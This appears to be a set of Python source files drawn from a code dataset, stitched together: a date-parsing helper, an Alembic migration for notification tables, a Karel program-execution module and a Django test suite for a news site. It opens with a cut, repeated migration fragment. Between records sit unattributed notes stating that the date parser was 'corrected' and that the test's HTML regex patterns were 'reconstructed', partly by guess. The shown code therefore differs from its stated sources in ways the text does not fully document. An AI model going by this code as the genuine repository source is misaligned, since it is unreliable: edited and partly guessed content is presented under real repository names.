2019-11-08 16:11:30.331270\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy import Boolean, String\nfrom sqlalchemy.sql import column, table\n\n\n# revision identifiers, used by Alembic.\nrevision = '4273ebef85cc'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! 
{"seq_id":"34365851734","text":"from dateutil.parser import parse\nfrom datetime import datetime\n\n\ndef parse_yyyymmdd(date):\n \"\"\"\n Get year, month and day from date format which MM and DD can be 00\n \"\"\"\n year, month, day = None, None, None\n try:\n _year = int(date[:4])\n d = datetime(_year, 1, 1)\n year = _year\n\n _month = int(date[4:6])\n d = datetime(year, _month, 1)\n month = _month\n\n _day = int(date[6:])\n d = datetime(year, month, _day)\n day = _day\n\n except:\n pass\n\n return year, month, day\n\n\ndef parse_months_names(months_names):\n flexible_date = {}\n if months_names:\n months = months_names.split(\"/\")\n flexible_date[\"initial_month_name\"] = months[0]\n flexible_date[\"final_month_name\"] = (\n months[-1] if months[-1] != months[0] else None\n )\n\n return flexible_date\n\n\ndef get_year_from_textual_date(date):\n \"\"\"\n Get year from non standard textual date\n \"\"\"\n # use parse, but only trust the year: there is no guarantee month and day\n # were recognized correctly, and the year is what matters most\n non_alpha = \"\".join([c for c in date if not c.isalpha()])\n for text in (date, non_alpha):\n try:\n parsed = parse(text)\n if str(parsed.year) in date:\n # when the year is absent, parse returns the current year\n return parsed.year\n except:\n pass\n\n\ndef parse_non_standard_date(date):\n \"\"\"\n Parse \"incomplete\" date which format is YYYYMMDD, and MM and DD can be 00,\n or textual date\n \"\"\"\n if not date:\n return {}\n flexible_date = {}\n flexible_date[\"date_text\"] = date\n\n if date.isdigit():\n year, month, day = parse_yyyymmdd(date)\n flexible_date[\"year\"] = year\n flexible_date[\"month_number\"] = month\n flexible_date[\"day\"] = day\n else:\n flexible_date[\"year\"] = get_year_from_textual_date(date)\n return flexible_date\n","repo_name":"scieloorg/scms-upload","sub_path":"core/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":1955,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"}
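A short usage sketch, assuming the corrected parse_yyyymmdd above (the original body referenced an undefined YYYYMMDD name and never imported datetime):

# Expected behaviour sketch:
print(parse_non_standard_date("20200200"))
# -> {'date_text': '20200200', 'year': 2020, 'month_number': 2, 'day': None}
print(parse_non_standard_date("March 2019"))
# -> {'date_text': 'March 2019', 'year': 2019}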
{"seq_id":"2992327939","text":"\"\"\"Initial tables\n\nRevision ID: 4273ebef85cc\nRevises:\nCreate Date: 2019-11-08 16:11:30.331270\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy import Boolean, String\nfrom sqlalchemy.sql import column, table\n\n\n# revision identifiers, used by Alembic.\nrevision = '4273ebef85cc'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('notification_status',\n sa.Column('code', sa.String(length=15), nullable=False),\n sa.Column('desc', sa.String(length=100), nullable=True),\n sa.Column('default', sa.Boolean(), nullable=False),\n sa.PrimaryKeyConstraint('code')\n )\n op.create_table('notification_type',\n sa.Column('code', sa.String(length=15), nullable=False),\n sa.Column('desc', sa.String(length=100), nullable=True),\n sa.Column('default', sa.Boolean(), nullable=False),\n sa.PrimaryKeyConstraint('code'),\n sa.UniqueConstraint('code')\n )\n op.create_table('notification',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('recipients', sa.String(length=2000), nullable=False),\n sa.Column('request_date', sa.DateTime(), nullable=False),\n sa.Column('sent_date', sa.DateTime(), nullable=True),\n sa.Column('type_code', sa.String(length=15), nullable=False),\n sa.Column('status_code', sa.String(length=15), nullable=False),\n sa.ForeignKeyConstraint(['status_code'], ['notification_status.code'], ),\n sa.ForeignKeyConstraint(['type_code'], ['notification_type.code'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('notification_contents',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('subject', sa.String(length=2000), nullable=False),\n sa.Column('body', sa.String(length=2000), nullable=False),\n sa.Column('attachment_name', sa.String(length=200), nullable=True),\n sa.Column('attachment', sa.Binary(), nullable=True),\n sa.Column('notification_id', sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint(['notification_id'], ['notification.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n\n notification_type_table = table('notification_type',\n column('code', String),\n column('desc', String),\n column('default', Boolean)\n )\n\n op.bulk_insert(\n notification_type_table,\n [\n {'code': 'EMAIL', 'desc': 'The Email type of notification', 'default': True},\n {'code': 'TEXT', 'desc': 'The Text message type of notification', 'default': False}\n ]\n )\n\n # Insert codes and descriptions for organization status\n notification_status_table = table('notification_status',\n column('code', String),\n column('desc', String),\n column('default', Boolean)\n )\n op.bulk_insert(\n notification_status_table,\n [\n {'code': 'PENDING', 'desc': 'Initial state of the notification', 'default': True},\n {'code': 'DELIVERED', 'desc': 'Status for a notification sent successfully', 'default': False},\n {'code': 'FAILURE', 'desc': 'Status for a notification that failed to send', 'default': False}\n ]\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('notification_contents')\n op.drop_table('notification')\n op.drop_table('notification_type')\n op.drop_table('notification_status')\n # ### end Alembic commands ###\n","repo_name":"peter-freshworks/sbc-auth","sub_path":"notify-api/migrations/versions/4273ebef85cc_initial_tables.py","file_name":"4273ebef85cc_initial_tables.py","file_ext":"py","file_size_in_byte":4203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"}
{"seq_id":"9643890933","text":"from __future__ import annotations\nfrom __future__ import absolute_import\nimport importlib.util\nimport inspect\nimport os\nimport sys\nimport traceback as tb\nimport json\nfrom types import FrameType\nfrom typing import Callable\n\n\nfrom code.step3_code2task.github_stanfordkarel.stanfordkarel.karel_program import KarelException\nfrom code.step3_code2task.github_stanfordkarel.stanfordkarel.karel_world import KarelWorld\nfrom code.step3_code2task.github_stanfordkarel.stanfordkarel.karel_application import KarelApplication\nfrom code.step3_code2task.github_stanfordkarel.stanfordkarel.karel_program import KarelProgram\nfrom code.step3_code2task.utils.codeast import json_to_ast\nfrom code.step3_code2task.sym_world import SymWorld\n\n\nclass SymCode:\n \"\"\"\n This class extracts a module from an arbitrary file that contains student code.\n https://stackoverflow.com/questions/67631/how-to-import-a-module-given-the-full-path\n \"\"\"\n\n def __init__(self, code_file: str) -> None:\n if not os.path.isfile(code_file):\n raise FileNotFoundError(f\"{code_file} could not be found.\")\n\n self.module_name = os.path.basename(code_file)\n if self.module_name.endswith(\".py\"):\n self.module_name = os.path.splitext(self.module_name)[0]\n\n spec = importlib.util.spec_from_file_location(\n self.module_name, os.path.abspath(code_file)\n )\n try:\n self.mod = importlib.util.module_from_spec(spec)\n spec.loader.exec_module(self.mod) # type: ignore\n except SyntaxError as e:\n # Handle syntax errors and only print location of error\n print(f\"Syntax Error: {e}\")\n print(\"\\n\".join(tb.format_exc(limit=0).split(\"\\n\")[1:]))\n sys.exit()\n\n # Do not proceed if the student has not defined a main function.\n if not hasattr(self.mod, \"main\"):\n print(\"Couldn't find the main() function. 
Are you sure you have one?\")\n sys.exit()\n\n def __repr__(self) -> str:\n return inspect.getsource(self.mod)\n\n def inject_namespace(self, karel: SymWorld) -> None:\n \"\"\"\n This function is responsible for doing some Python hackery\n that associates the generic commands the student wrote in their\n file with specific commands relating to the Karel object that exists\n in the world.\n \"\"\"\n functions_to_override = [\n \"move\",\n \"turn_left\",\n \"pick_beeper\",\n \"put_beeper\",\n \"turn_right\",\n # \"facing_north\",\n # \"facing_south\",\n # \"facing_east\",\n # \"facing_west\",\n # \"not_facing_north\",\n # \"not_facing_south\",\n # \"not_facing_east\",\n # \"not_facing_west\",\n \"front_is_clear\",\n \"beepers_present\",\n \"no_beepers_present\",\n #\"beepers_in_bag\",\n #\"no_beepers_in_bag\",\n \"front_is_blocked\",\n \"left_is_blocked\",\n \"left_is_clear\",\n \"right_is_blocked\",\n \"right_is_clear\",\n #\"paint_corner\",\n #\"corner_color_is\",\n ]\n for func in functions_to_override:\n setattr(self.mod, func, getattr(karel, func))\n\n\n\n\nclass SymApplication():\n\n def __init__(\n self,\n karel: SymWorld,\n code_file: str,\n json_code_file: str\n # master: tk.Tk,\n # window_width: int = 800,\n # window_height: int = 600,\n # canvas_width: int = 600,\n # canvas_height: int = 400,\n ) -> None:\n # # set window background to contrast white Karel canvas\n # master.configure(background=LIGHT_GREY)\n #\n # # configure location of canvas to expand to fit window resizing\n # master.rowconfigure(0, weight=1)\n # master.columnconfigure(1, weight=1)\n #\n # # set master geometry\n # master.geometry(f\"{window_width}x{window_height}\")\n #\n # super().__init__(master, background=LIGHT_GREY)\n\n self.karel = karel\n self.code_file = code_file\n self.json_code_file = json_code_file\n self.num_code_blocks = self.get_num_code_blocks(self.json_code_file)\n #self.world = karel.world\n self.student_code = SymCode(code_file)\n self.student_code.inject_namespace(karel)\n #master.title(self.student_code.module_name)\n if not self.student_code.mod:\n #master.destroy()\n return\n # self.icon = DEFAULT_ICON\n # self.window_width = window_width\n # self.window_height = window_height\n # self.canvas_width = canvas_width\n # self.canvas_height = canvas_height\n # self.master = master\n # self.set_dock_icon()\n self.coverage_info = []\n self.inject_decorator_namespace()\n # self.grid(row=0, column=0)\n # self.create_menubar()\n # self.create_canvas()\n # self.create_buttons()\n # self.create_slider()\n # self.create_status_label()\n\n def get_num_code_blocks(self, json_file:str):\n\n try:\n with open(json_file, \"r\") as fp:\n code_dict = json.load(fp)\n except:\n print(\"Unable to open the json code file.\", json_file)\n exit(0)\n\n code_ast = json_to_ast(code_dict)\n if code_ast._n_if_only == 0 and code_ast._n_while == 0 and code_ast._n_repeat == 0 and code_ast._n_if_else == 0:\n self.basic_action_flag = True\n else:\n self.basic_action_flag = False\n return code_ast.size()+1 # to include the RUN block\n\n\n\n def karel_action_decorator(\n self, karel_fn: Callable[..., None]\n ) -> Callable[..., None]:\n def wrapper() -> None:\n # execute Karel function\n karel_fn()\n # redraw canvas with updated state of the world\n #self.canvas.redraw_karel()\n # delay by specified amount\n # sleep(1 - self.speed.get() / 100)\n\n return wrapper\n\n def beeper_action_decorator(\n self, karel_fn: Callable[..., None]\n ) -> Callable[..., None]:\n def wrapper() -> None:\n # execute Karel function\n karel_fn()\n 
# redraw canvas with updated state of the world\n # self.canvas.redraw_beepers()\n # self.canvas.redraw_karel()\n # delay by specified amount\n # sleep(1 - self.speed.get() / 100)\n\n return wrapper\n\n def corner_action_decorator(\n self, karel_fn: Callable[..., None]\n ) -> Callable[..., None]:\n def wrapper(color: str) -> None:\n # execute Karel function\n karel_fn(color)\n # redraw canvas with updated state of the world\n # self.canvas.redraw_corners()\n # self.canvas.redraw_beepers()\n # self.canvas.redraw_karel()\n # # delay by specified amount\n # sleep(1 - self.speed.get() / 100)\n\n return wrapper\n\n def inject_decorator_namespace(self) -> None:\n \"\"\"\n This function is responsible for doing some Python hackery\n that associates the generic commands the student wrote in their\n file with specific commands relating to the Karel object that exists\n in the world.\n \"\"\"\n self.student_code.mod.turn_left = self.karel_action_decorator( # type: ignore\n self.karel.turn_left\n )\n self.student_code.mod.turn_right = self.karel_action_decorator( # type: ignore\n self.karel.turn_right\n )\n self.student_code.mod.move = self.karel_action_decorator( # type: ignore\n self.karel.move\n )\n self.student_code.mod.pick_beeper = ( # type: ignore\n self.beeper_action_decorator(self.karel.pick_beeper)\n )\n self.student_code.mod.put_beeper = self.beeper_action_decorator( # type: ignore\n self.karel.put_beeper\n )\n # self.student_code.mod.paint_corner = ( # type: ignore\n # self.corner_action_decorator(self.karel.paint_corner)\n # )\n\n # def disable_buttons(self) -> None:\n # self.program_control_button.configure(state=\"disabled\")\n # self.load_world_button.configure(state=\"disabled\")\n #\n # def enable_buttons(self) -> None:\n # self.program_control_button.configure(state=\"normal\")\n # self.load_world_button.configure(state=\"normal\")\n\n def display_error_traceback(self, e: KarelException | NameError) -> None:\n print(\"Traceback (most recent call last):\")\n display_frames: list[tuple[FrameType, int]] = []\n # walk through all the frames in stack trace at time of failure\n for frame, lineno in tb.walk_tb(e.__traceback__):\n frame_info = inspect.getframeinfo(frame)\n # get the name of the file corresponding to the current frame\n filename = frame_info.filename\n # Only display frames generated within the student's code\n if self.student_code.module_name + \".py\" in filename:\n display_frames.append((frame, lineno))\n\n trace = tb.format_list(tb.StackSummary.extract(display_frames)) # type: ignore\n print(\"\".join(trace).strip())\n print(f\"{type(e).__name__}: {e}\")\n\n def run_program(self) -> None:\n ### trace the conditions\n # traced_func = trace_conditions(self.student_code.mod.main, return_conditions=True)\n # self.coverage_info = traced_func()\n self.cov = self.student_code.mod.main()\n\n\n\n\n def run_karel_program(self, input_karel_world: KarelWorld):\n\n # instance of KarelProgram\n karel_program = KarelProgram(\"\")\n karel_program.world = input_karel_world\n karel_program.avenue, karel_program.street = input_karel_world.karel_start_location[0], input_karel_world.karel_start_location[1]\n karel_program.direction = input_karel_world.karel_start_direction\n karel_program.num_beepers = input_karel_world.karel_start_beeper_count\n\n # instance of KarelApplication\n karel_app = KarelApplication(karel_program, self.code_file)\n try:\n karel_app.run_program()\n except:\n # print(\"Error in running concrete Karel Program\")\n return None\n\n return karel_app.karel.karel_seq\n\n 
# def reset_world(self) -> None:\n # self.karel.reset_state()\n # self.world.reset_world()\n # self.canvas.redraw_all()\n # self.status_label.configure(text=\"Reset to initial state.\", fg=\"black\")\n # # Once world has been reset, program control button resets to \"run\" mode\n # self.program_control_button[\"text\"] = \"Run Program\"\n # self.program_control_button[\"command\"] = self.run_program\n # self.update()\n #\n # def load_world(self) -> None:\n # default_worlds_path = os.path.join(os.path.dirname(__file__), \"worlds\")\n # filename = askopenfilename(\n # initialdir=default_worlds_path,\n # title=\"Select Karel World\",\n # filetypes=[(\"Karel Worlds\", \"*.w\")],\n # parent=self.master,\n # )\n # # User hit cancel and did not select file, so leave world as-is\n # if filename == \"\":\n # return\n # self.world.reload_world(filename=filename)\n # self.karel.reset_state()\n # # self.canvas.redraw_all()\n # # # Reset speed slider\n # # self.scale.set(self.world.init_speed)\n # # self.status_label.configure(\n # # text=f\"Loaded world from {os.path.basename(filename)}.\", fg=\"black\"\n # # )\n #\n # # # Make sure program control button is set to 'run' mode\n # # self.program_control_button[\"text\"] = \"Run Program\"\n # # self.program_control_button[\"command\"] = self.run_program\n","repo_name":"machine-teaching-group/aied2022_pquizsyn","sub_path":"code/step3_code2task/sym_code.py","file_name":"sym_code.py","file_ext":"py","file_size_in_byte":11834,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"}
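The injection trick in sym_code.py (overriding names in the student's module object so their free-standing calls bind to a concrete Karel/world) boils down to setattr on a module. A self-contained sketch with hypothetical names:

# Minimal sketch of module-namespace injection; "student_code" and Robot
# are illustrative, not part of the repository above.
import types

mod = types.ModuleType("student_code")
exec("def main():\n    move()", mod.__dict__)

class Robot:
    def move(self):
        print("robot moved")

robot = Robot()
for name in ["move"]:
    setattr(mod, name, getattr(robot, name))  # rebind the free name in the module
mod.main()  # prints "robot moved"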
{"seq_id":"72239465794","text":"# -*- coding: utf-8 -*-\nimport copy\nimport http.cookiejar\nimport json\nimport re\nimport urllib\nfrom datetime import datetime\nimport os\nfrom hstest import CheckResult, DjangoTest\n\n\nclass HyperNewsTest(DjangoTest):\n\n use_database = True\n\n COMMON_LINK_PATTERN = '''<a[^>]+href=['\"]([a-zA-Z\d/_]+)['\"][^>]*>'''\n CSRF_PATTERN = b'<input[^>]+name=\"csrfmiddlewaretoken\" ' \\\n b'value=\"(?P<csrf>\w+)\"[^>]*>'\n GROUPS_FIRST_PATTERN = '<h4>.*?</h4>.*?<ul>.+?</ul>'\n GROUPS_SECOND_PATTERN = (\n '''<a[^>]+href=['\"]([a-zA-Z\d/_]+)['\"][^>]*>(.+?)</a>'''\n )\n H2_PATTERN = '<h2>(.+?)</h2>'\n H4_PATTERN = '<h4>(.+?)</h4>'\n PARAGRAPH_PATTERN = '<p>(.+?)</p>'\n TEXT_LINK_PATTERN = '''<a[^>]+href=['\"][a-zA-Z\d/_]+['\"][^>]*>(.+?)</a>'''\n cookie_jar = http.cookiejar.CookieJar()\n\n def __init__(self, *args, **kwargs):\n current_dir = os.path.dirname(os.path.abspath(__file__))\n self.news_file_name = os.path.join(current_dir,\n os.path.join('..', 'hypernews', 'news.json'))\n if not os.path.exists(os.path.split(self.news_file_name)[0]):\n os.makedirs(os.path.split(self.news_file_name)[0])\n os.environ['NEWS_JSON_PATH'] = self.news_file_name\n super().__init__(*args, **kwargs)\n\n def __stripped_list(self, list):\n return [item.strip() for item in list]\n\n def __setup(self):\n self.news_data = [{\n 'created': '2020-02-22 16:40:00',\n 'text': 'A new star appeared in the sky.',\n 'title': 'A star is born',\n 'link': 9234732\n }, {\n 'created': '2020-02-09 14:15:10',\n 'text': 'Text of the news 1',\n 'title': 'News 1',\n 'link': 1\n }, {\n 'created': '2020-02-10 14:15:10',\n 'text': 'Text of the news 2',\n 'title': 'News 2',\n 'link': 2\n }, {\n 'created': '2020-02-09 16:15:10',\n 'text': 'Text of the news 3',\n 'title': 'News 3',\n 'link': 3\n }]\n with open(self.news_file_name, 'w') as f:\n json.dump(self.news_data, f)\n\n self.coming_soon_page_link = self.get_url()\n self.main_page_link = self.get_url() + 'news/'\n self.create_page_link = self.main_page_link + 'create/'\n\n def check_coming_soon_page(self) -> CheckResult:\n self.__setup()\n\n try:\n page = self.read_page(self.coming_soon_page_link)\n except urllib.error.URLError:\n return CheckResult.wrong(\n f'Cannot connect to the \"Coming soon\" page ({self.coming_soon_page_link}).')\n\n opener = urllib.request.build_opener(\n urllib.request.HTTPCookieProcessor(self.cookie_jar))\n try:\n response = opener.open(self.coming_soon_page_link)\n except urllib.error.URLError:\n return CheckResult.wrong(\n f'Cannot connect to the \"Coming soon\" page ({self.coming_soon_page_link}).')\n\n coming_soon_text = 'Coming soon'\n\n # response.url for the backward compatibility\n if (coming_soon_text not in page\n and response.url != self.main_page_link):\n return CheckResult.wrong(\n f'\"Coming soon\" page ({self.coming_soon_page_link}) should contain \"Coming soon\" text'\n )\n\n return CheckResult.correct()\n\n def check_coming_soon_page_redirect(self) -> CheckResult:\n self.__setup()\n\n opener = urllib.request.build_opener(\n urllib.request.HTTPCookieProcessor(self.cookie_jar))\n try:\n response = opener.open(self.coming_soon_page_link)\n except urllib.error.URLError:\n return CheckResult.wrong(\n f'Cannot connect to the \"Coming soon\" page ({self.coming_soon_page_link}).')\n\n if response.url != self.main_page_link:\n return CheckResult.wrong(\n f'\"Coming soon\" ({self.coming_soon_page_link}) page should redirect to {self.main_page_link}'\n )\n\n return CheckResult.correct()\n\n def check_main_header(self) -> CheckResult:\n self.__setup()\n try:\n page = self.read_page(self.main_page_link)\n except urllib.error.URLError:\n return CheckResult.wrong(\n f'Cannot connect to the main page {self.main_page_link}.'\n )\n\n h2_headers = re.findall(self.H2_PATTERN, page, re.S)\n h2_headers = self.__stripped_list(h2_headers)\n main_header = 'Hyper news'\n\n if len(h2_headers) != 1:\n return CheckResult.wrong(\n f'News page should contain one <h2> element (<h2>Hyper news</h2>). '\n f'Now news page contains {len(h2_headers)} <h2> elements.'\n )\n\n if main_header not in h2_headers:\n return CheckResult.wrong(\n f'Main page {self.main_page_link} should contain <h2> 
element with text \"Hyper news\"'\n )\n\n return CheckResult.correct()\n\n def check_news_page(self) -> CheckResult:\n self.__setup()\n\n for testing_news in self.news_data:\n created = testing_news['created']\n text = testing_news['text']\n title = testing_news['title']\n link = testing_news['link']\n task2_example_link = 9234732\n\n try:\n page = self.read_page(self.main_page_link + f'{link}/')\n except urllib.error.URLError:\n return CheckResult.wrong(\n f'Cannot connect to the news page at {self.main_page_link}\"link\"/ '\n 'where \"link\" is the data of the link field from json file'\n )\n\n page_headers = re.findall(self.H2_PATTERN, page, re.S)\n page_headers = self.__stripped_list(page_headers)\n page_paragraphs = re.findall(self.PARAGRAPH_PATTERN, page, re.S)\n page_paragraphs = self.__stripped_list(page_paragraphs)\n\n if len(page_headers) != 1:\n return CheckResult.wrong(\n f'News page should contain one

element with the data '\n f'of the title field from json file. '\n f'Now news page containt {len(page_headers)}

elements.'\n )\n\n if len(page_paragraphs) != 2:\n return CheckResult.wrong(\n f'News page should contain two

elements with the data '\n f'of the text field and the created field from json file. '\n f'Now news page containt {len(page_paragraphs)}

elements.'\n )\n\n page_title = page_headers[0]\n\n if title not in page_title:\n if link is task2_example_link:\n return CheckResult.wrong(\n 'News page should contain

element with the data '\n 'of the title field from json file. '\n 'For example, the result for the data of the title field '\n f'\"{title}\" is \"{page_title}\".'\n )\n\n return CheckResult.wrong(\n 'News page should contain

element with the data '\n 'of the title field from json file.'\n )\n\n page_created = page_paragraphs[0]\n page_text = page_paragraphs[1]\n\n if text not in page_text:\n if link is task2_example_link:\n return CheckResult.wrong(\n 'News page should contain

element with the data '\n 'of the text field from json file. '\n 'For example, the result for the data of the text field '\n f'\"{text}\" is \"{page_text}\".'\n )\n\n return CheckResult.wrong(\n 'News page should contain

element with the data '\n 'of the text field from json file.'\n )\n\n if created not in page_created:\n if link is task2_example_link:\n return CheckResult.wrong(\n 'News page should contain

element with the data '\n 'of the created field from json file '\n 'in the format: \"%Y-%m-%d %H:%M:%S\". '\n 'For example, the result for the data of the created field '\n f'\"{created}\" is \"{page_created}\".'\n )\n\n return CheckResult.wrong(\n 'News page should contain

element with the data '\n 'of the created field from json file '\n 'in the format: \"%Y-%m-%d %H:%M:%S\".'\n )\n\n return CheckResult.correct()\n\n def check_main_page_create_link(self):\n self.__setup()\n create_link = '/news/create/'\n\n try:\n page = self.read_page(self.main_page_link)\n except urllib.error.URLError:\n return CheckResult.wrong(\n f'Cannot connect to the main page ({self.main_page_link}).'\n )\n\n links_from_page = re.findall(self.COMMON_LINK_PATTERN, page, re.S)\n links_from_page = self.__stripped_list(links_from_page)\n\n if create_link not in links_from_page:\n return CheckResult.wrong(\n f'Main page ({self.main_page_link}) should contain <a> element with href {create_link}'\n )\n\n if len(links_from_page) - 1 != len(self.news_data):\n return CheckResult.wrong(\n f'Main page ({self.main_page_link}) should contain {len(self.news_data) + 1} <a> elements. '\n f'{len(self.news_data)} <a> elements with href to news pages from the json file data '\n f'and one <a> element with href {create_link}. '\n f'Now main page contains {len(links_from_page)} <a> elements.'\n )\n\n return CheckResult.correct()\n\n def check_main_page(self) -> CheckResult:\n self.__setup()\n created_set = set()\n news_data = copy.deepcopy(self.news_data)\n for news in news_data:\n created_dt = datetime.strptime(news['created'],\n '%Y-%m-%d %H:%M:%S') \\\n .date()\n created_set.add(created_dt)\n\n created_list = [x for x in created_set]\n created_list.sort(reverse=True)\n created_list_str = [x.strftime('%Y-%m-%d') for x in created_list]\n\n try:\n page = self.read_page(self.main_page_link)\n except urllib.error.URLError:\n return CheckResult.wrong(\n f'Cannot connect to the main page {self.main_page_link}.'\n )\n\n h4_headers = re.findall(self.H4_PATTERN, page, re.S)\n h4_headers = self.__stripped_list(h4_headers)\n filtered_h4 = list(filter(lambda x: x in created_list_str, h4_headers))\n page_links = re.findall(self.COMMON_LINK_PATTERN, page, re.S)\n\n if filtered_h4 != created_list_str:\n return CheckResult.wrong(\n f'Main page ({self.main_page_link}) should contain <h4> 
elements grouped by '\n 'date created, with the freshest news first.'\n )\n\n for news in news_data:\n created_date = datetime.strptime(news['created'],\n '%Y-%m-%d %H:%M:%S') \\\n .date()\n news['created_date'] = created_date\n news['created_date_str'] = created_date.strftime('%Y-%m-%d')\n news['link'] = '/news/{}/'.format(news['link'])\n\n file_data = sorted(news_data, key=lambda x: x['title'])\n file_data = sorted(\n file_data, key=lambda x: x['created_date'], reverse=True)\n\n for news in file_data:\n news.pop('created_date')\n news.pop('created')\n news.pop('text')\n\n groups = re.findall(self.GROUPS_FIRST_PATTERN, page, re.S)\n news_list = [\n sorted(re.findall(self.GROUPS_SECOND_PATTERN, group, re.S),\n key=lambda news: news[1])\n for group in groups\n ]\n response_data = []\n for news_l, h4 in zip(news_list, filtered_h4):\n for news in news_l:\n response_data.append({\n 'created_date_str': h4,\n 'link': news[0],\n 'title': news[1].strip()\n })\n\n if response_data != file_data:\n return CheckResult.wrong(\n f'Main page ({self.main_page_link}) should contain {len(file_data)} '\n '<a> elements with href to news pages.'\n )\n\n return CheckResult.correct()\n\n def check_creating_news(self):\n self.__setup()\n old_news_titles = [news['title'] for news in self.news_data]\n\n new_news = {\n 'title': 'News 4',\n 'text': 'Text of the news 4',\n }\n\n titles = (*old_news_titles, new_news['title'])\n\n opener = urllib.request.build_opener(\n urllib.request.HTTPCookieProcessor(self.cookie_jar))\n try:\n create_page_response = opener.open(\n self.create_page_link)\n except urllib.error.URLError:\n return CheckResult.wrong(f'Cannot connect to the create page ({self.create_page_link}).')\n\n create_page = create_page_response.read()\n\n csrf_options = re.findall(self.CSRF_PATTERN, create_page)\n if not csrf_options:\n return CheckResult.wrong(\n 'Missing csrf_token in the create page form')\n\n try:\n create_response = opener.open(\n self.create_page_link,\n data=urllib.parse.urlencode({\n 'title': new_news['title'],\n 'text': new_news['text'],\n 'csrfmiddlewaretoken': csrf_options[0],\n }).encode()\n )\n except urllib.error.URLError as err:\n if 'Forbidden' not in err.reason:\n return CheckResult.wrong(\n f'Wrong response for forbidden requests: {err.reason}')\n\n if create_response.url != self.main_page_link:\n return CheckResult.wrong(\n 'After creating news the handler should redirect to the /news/ '\n 'page')\n\n try:\n page = self.read_page(self.main_page_link)\n except urllib.error.URLError:\n return CheckResult.wrong(\n f'Cannot connect to the main page ({self.main_page_link}).'\n )\n\n links_from_page = re.findall(self.TEXT_LINK_PATTERN, page, re.S)\n links_from_page = self.__stripped_list(links_from_page)\n\n for title in titles:\n if title not in links_from_page:\n return CheckResult.wrong(\n f'After creating news main page ({self.main_page_link}) can\\'t find {title}')\n\n return CheckResult.correct()\n\n def check_create_page_main_link(self):\n self.__setup()\n main_link = '/news/'\n\n try:\n page = self.read_page(self.create_page_link)\n except urllib.error.URLError:\n return CheckResult.wrong(\n f'Cannot connect to the create page ({self.create_page_link}).'\n )\n\n links_from_page = re.findall(self.COMMON_LINK_PATTERN, page, re.S)\n links_from_page = self.__stripped_list(links_from_page)\n\n if main_link not in links_from_page:\n return CheckResult.wrong(\n f'Create page {self.create_page_link} should contain '\n f'<a> element with href {main_link}'\n )\n\n return CheckResult.correct()\n\n 
def check_news_page_main_link(self):\n self.__setup()\n main_link = '/news/'\n\n testing_news = self.news_data[0]\n link = testing_news['link']\n\n try:\n page = self.read_page(self.main_page_link + f'{link}/')\n except urllib.error.URLError:\n return CheckResult.wrong(\n f'Cannot connect to the news page at {self.main_page_link}\"link\"/ '\n 'where \"link\" is the data of the link field from json file'\n )\n\n links_from_page = re.findall(self.COMMON_LINK_PATTERN, page, re.S)\n links_from_page = self.__stripped_list(links_from_page)\n\n if main_link not in links_from_page:\n return CheckResult.wrong(\n f'News page should contain <a> element with href {main_link}'\n )\n\n return CheckResult.correct()\n\n def check_main_page_search(self):\n self.__setup()\n q = '2'\n news_data = copy.deepcopy(self.news_data)\n\n for news in news_data:\n created_date = datetime.strptime(news['created'],\n '%Y-%m-%d %H:%M:%S') \\\n .date()\n news['created_date_str'] = created_date.strftime('%Y-%m-%d')\n\n all_headers = set((x['created_date_str'] for x in news_data))\n visible_headers = set((x['created_date_str'] for x in news_data\n if q in x['title']))\n invisible_headers = all_headers - visible_headers\n visible_titles = [x['title'] for x in news_data\n if q in x['title']]\n invisible_titles = [x['title'] for x in news_data\n if q not in x['title']]\n\n try:\n search_page_link = self.main_page_link + f'?q={q}'\n page = self.read_page(search_page_link)\n except urllib.error.URLError:\n return CheckResult.wrong(\n 'Cannot connect to the search page.'\n )\n\n h4_headers = re.findall(self.H4_PATTERN, page, re.S)\n h4_headers = self.__stripped_list(h4_headers)\n\n for header in visible_headers:\n if header not in h4_headers:\n return CheckResult.wrong(\n 'Search page should contain headers with found news'\n )\n\n for header in invisible_headers:\n if header in h4_headers:\n return CheckResult.wrong(\n 'Search page should not contain headers with unfound news'\n )\n\n titles = re.findall(self.TEXT_LINK_PATTERN, page, re.S)\n titles = self.__stripped_list(titles)\n\n for title in visible_titles:\n if title not in titles:\n return CheckResult.wrong(\n 'Search page should contain found news'\n )\n\n for title in invisible_titles:\n if title in titles:\n return CheckResult.wrong(\n 'Search page should not contain unfound news'\n )\n\n return CheckResult.correct()\n","repo_name":"dev-mamun/news-portal","sub_path":"test/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":18906,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"}
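The HTML tag literals in the patterns above were lost to tag-stripping and have been reconstructed from how each pattern is used; GROUPS_FIRST_PATTERN in particular is a best-effort guess. A quick self-contained sanity check of the reconstructions:

# Sketch: verify the reconstructed patterns against a toy HTML fragment.
import re
html = '<h4>2020-02-09</h4> <ul> <li><a href="/news/1/">News 1</a></li> </ul>'
assert re.findall('<h4>(.+?)</h4>', html) == ['2020-02-09']
assert re.findall(r'''<a[^>]+href=['"]([a-zA-Z\d/_]+)['"][^>]*>(.+?)</a>''',
                  html) == [('/news/1/', 'News 1')]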
